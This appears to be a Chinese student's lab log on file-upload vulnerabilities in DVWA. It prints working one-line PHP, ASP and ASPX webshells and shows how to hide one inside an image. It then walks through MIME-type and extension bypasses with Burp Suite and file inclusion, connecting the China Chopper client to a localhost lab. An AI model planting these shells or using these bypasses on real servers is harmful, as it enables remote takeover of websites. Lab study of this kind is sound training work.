1.学习file upload(文件上传)

上网了解了以下,关于文件上传就是对上传文件的类型、内容没有进行严格的过滤和检查,
就使得攻击者可以通过上传木马获取服务器的webshell权限。
然后去对webshell搜查了一下,大概web就是需要服务器开放web服务,shell就是取得对服务器某种程度上操作权限。
webshell是以asp、php、jsp或者cgi等网页文件形式存在的
如果想要拿到一个网站的webshell,那么攻击者通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起。
然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。

关于它的安全防范,网上的推荐方法就是:
可写目录不给执行权限,有执行权限的目录不给写权限。

具体的方法我觉得比较常见的应该有三种:

①建议用户通过ftp来上传、维护网页,尽量不安装asp的上传程序。
②对asp上传程序的调用一定要进行身份认证,并只允许信任的人使用上传程序。
③asp程序管理员的用户名和密码不要太关于简单了

2.学习各种一句话木马,图片马姿势

一般来说一句话木马就是语句短少,命令简单的语句
有三类特别常见的木马:
一 php:<?php @eval($_POST[hack]);?>
二 asp:<%eval request (“hack”)%>
三 aspx:<%@ Page Language=“Jscript”%> <%eval(Request.Item[“hack”],“unsafe”);%>

其中php一句话木马的原理是利用 php 中的 eval 函数,将传入的任何语句作为 php 语句执行。通过访问该文件,以 post 方式传入参数,eval 函数再将接收的语句作为 php 语句执行,其中 hack 是密码。
@ 在php中的作用是抑制错误提示。就是无论后面出错没有都不用提示
在记事本中输入php的常见一句话木马,然后更改它的名字就可以了
第五次任务

图片马是因为一般直接上传木马文件都会被过滤拦截,这时候就需要用到图片马
就是将一句话木马与图片相结合,使得图片中包含代码
简单来说就是将一张图片和一句话木马结合起来
所以先准备一张图片和一句话木马,进入cmd

输入copy的命令,/b 表示以二进制方式打开,/a 表示以ASCII方式打开
第五次任务

这样就可以了
第五次任务使用编辑器打开的话,可以看到前面全是乱码,而最后一句话就是一句话木马
第五次任务

3.学习使用中国菜刀;

4.完成dvwa第四个模块file upload;

中国菜刀的使用范围比较广,是只要支持动态脚本的网站,都可以用中国菜刀来进行管理
菜刀的工作原理是:利用上传到服务器的一句话木马再通过一些添加配置就可以工作了
关于它的使用也比较简单
首先打开它,看到主页:
第五次任务右键点击添加:
第五次任务这个时候需要进行相关的配置
第一栏地址是网站shell的地址,密码是需要自己设置的,然后是脚本类型
第五次任务因为中国菜刀的使用要配合这上传的文件一起使用,所以第三个任务和第四个任务一起结合来做

LOW级别:
进入dvwa的官网,先将安全等级调到low,查看它的代码,发现它没有任务防范的措施,可以直接上传一句话木马
第五次任务很容易就成功了,果然在文件夹中找到了它,上传成功
第五次任务
然后用中国菜刀连接
在这里地址直接输入:http://127.0.0.1/DVWA-1.9/hackable/uploads/hack.php 然后输入自己写的一句话的密码,调成php模式就完成了
第五次任务
medium级别:
点开代码发现现在限制了格式为image/jpeg或是png 大小小于100000字节的文件才能上传,直接上传是不行的了
第五次任务
在这里我是用burpsuite抓包来更改它的格式的
第五次任务更改它的type就可以了
第五次任务第五次任务

5.和文件包含结合完成high级别

点开代码,发现多了一行
(($uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, ‘.’
) + 1);
上网查了一下,而这句话的作用就是说它会验证文件的最后一个点之后的格式上面的例子来说就是不管你前面写了多少,只验证最后的 ’.jpg

这个我是先利用之前学的图片马来结合完成的,先将一句话木马和一张图片结合起来,因为之前已经合成过了,这里就可以直接利用了。
第五次任务发现上传是可以的,但是在连接中国菜刀的时候发现无法成功了。
因为说是和文件包含一起结合完成,所以给了我启发
在输入地址的时候,我结合上次的文件包含的内容输的是http://127.0.0.1/DVWA-1.9/vulnerabilities/fi/?page=file://D:\phpstudy\WWW\DVWA-1.9\hackable\uploads\hack.jp
第五次任务中国菜刀就连接成功了

相关文章: